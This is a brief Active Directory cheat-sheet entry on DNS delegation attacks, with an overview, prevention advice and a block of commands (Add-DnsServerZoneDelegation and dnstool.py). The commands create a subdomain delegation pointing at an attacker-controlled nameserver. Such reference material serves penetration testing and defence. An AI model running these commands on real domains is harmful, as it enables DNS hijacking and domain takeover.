Dns Ad Delegation
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
DNS AD Delegation attacks exploit DNS delegation permissions in Active Directory. Users with create/delete permissions on DNS zones can create subdomain delegations pointing to attacker-controlled DNS servers.
This enables domain takeover attacks by tricking the domain's DNS resolution to redirect traffic to attacker infrastructure.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Dns Ad Delegation:
Get-DnsServerZone -ComputerName dc.domain.localAdd-DnsServerZoneDelegation -Name sub.domain.local -NameServer attacker.com -IPAddress 10.10.14.5dnstool.py -u domain.local\user -p password --print-zones dc.domain.localdnstool.py -u domain.local\user -p password --create-delegation dc.domain.local subTools & Techniques
Recommended tools for Dns Ad Delegation:
- dnstool: Python tool from KrbRelayUp for DNS manipulation
- PowerShell DNS cmdlets: Get-DnsServerZone, Add-DnsServerZoneDelegation
- Requires: DNS admin permissions or write access to DNS zone
Prevention & Mitigation
Security recommendations to prevent Dns Ad Delegation:
- Restrict who has modify permissions on DNS zones
- Audit DNS delegation changes regularly
- Use secure DNS with DNSSEC where possible
- Monitor for unauthorized DNS delegation modifications
References
Additional resources: